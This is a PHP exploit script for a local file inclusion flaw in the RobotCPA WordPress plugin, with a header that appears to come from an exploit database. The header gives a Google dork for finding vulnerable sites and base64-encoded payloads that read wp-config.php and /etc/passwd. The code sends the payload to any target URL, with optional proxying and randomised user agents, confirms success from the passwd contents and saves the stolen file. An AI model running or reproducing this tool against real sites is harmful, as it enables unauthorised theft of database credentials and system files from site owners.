<?php
ini_set('display_errors', FALSE);

/*

Script-Exploit developed by CoderPirata
>BLOG    - http://coderpirata.blogspot.com/
>TWITTER - https://twitter.com/coderpirata

##################################################################################################
##################################################################################################
# Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: 5V
# Tested on: Windows (Firefox)
                   Linux      (Firefox)
The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.
Like that : 
php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
or
file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk
 
our injection look then like that :
http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
and we can see the content of the passwd file.
 
greets to Black Sniper
Regards T3N38R15
----
https://www.exploit-db.com/exploits/37252/
http://milw00rm.org/exploits/9136/
##################################################################################################
##################################################################################################
*/

$opt = getopt("u:", ["proxy:", "save::"]);

#BANNER
echo "
|::::[ RobotCP Local File Include (SCRIPT-EXPLOIT) ]::::|
| Author: T3N38R15                                      |
| Script-Exploit by CoderPirata                         |
'-------------------------------------------------------'\n
Simple usage : {$_SERVER["SCRIPT_NAME"]} -u http://target.com/wordpress/
Using proxy  : {$_SERVER["SCRIPT_NAME"]} -u http://target.com/wordpress/ --proxy 127.0.0.1:80
Saving result: {$_SERVER["SCRIPT_NAME"]} -u http://target.com/wordpress/ --save\n\n";

if(!isset($opt['u'])){die();}
if(isset($opt['save'])){$a=1;}
if(!eregi("http",$opt['u'])){$opt['u']="http://".$opt['u'];}

echo "---------------------------------------------------------\n\n";
if(!function_exists("curl_init")){ echo "\n\ncURL not available, file_get_contents will be used!\n\n"; }

echo "TARGET: {$opt["u"]}\nIP: ";

#IP 
if(substr($opt["u"],-1) != "/"){ $opt["u"] = $opt["u"]."/";}
preg_match_all("#://(.*?)/#", $opt["u"], $link_b, PREG_SET_ORDER); 
$basel=$link_b[0][1];
if(substr(strtolower($opt["u"]), 0, 4) != "www."){$basel = "www.".$basel;}
echo gethostbyname($basel)."\n\nAnd... ";

#GRAB PAGE
$resultado=NULL;
$poc="/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk";
if(function_exists("curl_init")){
$ua = array("Firefox", "Mobile", "Opera", "Tor Browser", "GoogleBot", "Internet Explorer",
             "Redhat Linux", "Ubuntu", "FreeBSD Linux", "CentOS Linux", "Android", "Debian Linux",
             "en-US", "pt-BR", "cs_CZ", "pt_PT", "ru_RU", "en_IN");
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, $opt["u"].$poc);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
if($opt["proxy"]!=""){
 $pp = explode(":", $opt["proxy"]);
 curl_setopt($ch, CURLOPT_PROXY, $pp[0] );
 curl_setopt($ch, CURLOPT_PROXYPORT, $pp[1]);
}
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $ua[rand(0,5)]."/".rand(0,5).".".rand(0,5)." (".$ua[rand(5,10)]."; ".$ua[rand(10,15)].";)");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$page = curl_exec($ch); 
curl_close($ch);
}elseif(empty($page) and function_exists("file_get_contents")){
 $page = file_get_contents($opt["u"]);
}

#VERIFY
if(eregi("root:x:",$page) or eregi("/root:/",$page)){
 echo "SUCESS!\nTHE TARGET IS VULNERABLE!\n\nLINK: ".$opt["u"].$poc."\n";
if(isset($opt["save"])){
 echo "\nRESULT SAVED IN \"".realpath(".").DIRECTORY_SEPARATOR.$basel.".txt\"\n";
 file_put_contents($basel.".txt", $page, FILE_APPEND); 
}
}else{
 echo "FAIL!\nTHE TARGET IS NOT VULNERABLE!\n\nLINK: ".$opt["u"].$poc."\n";
}
echo "\n----------\n";

#END

# siph0n [2015-06-27]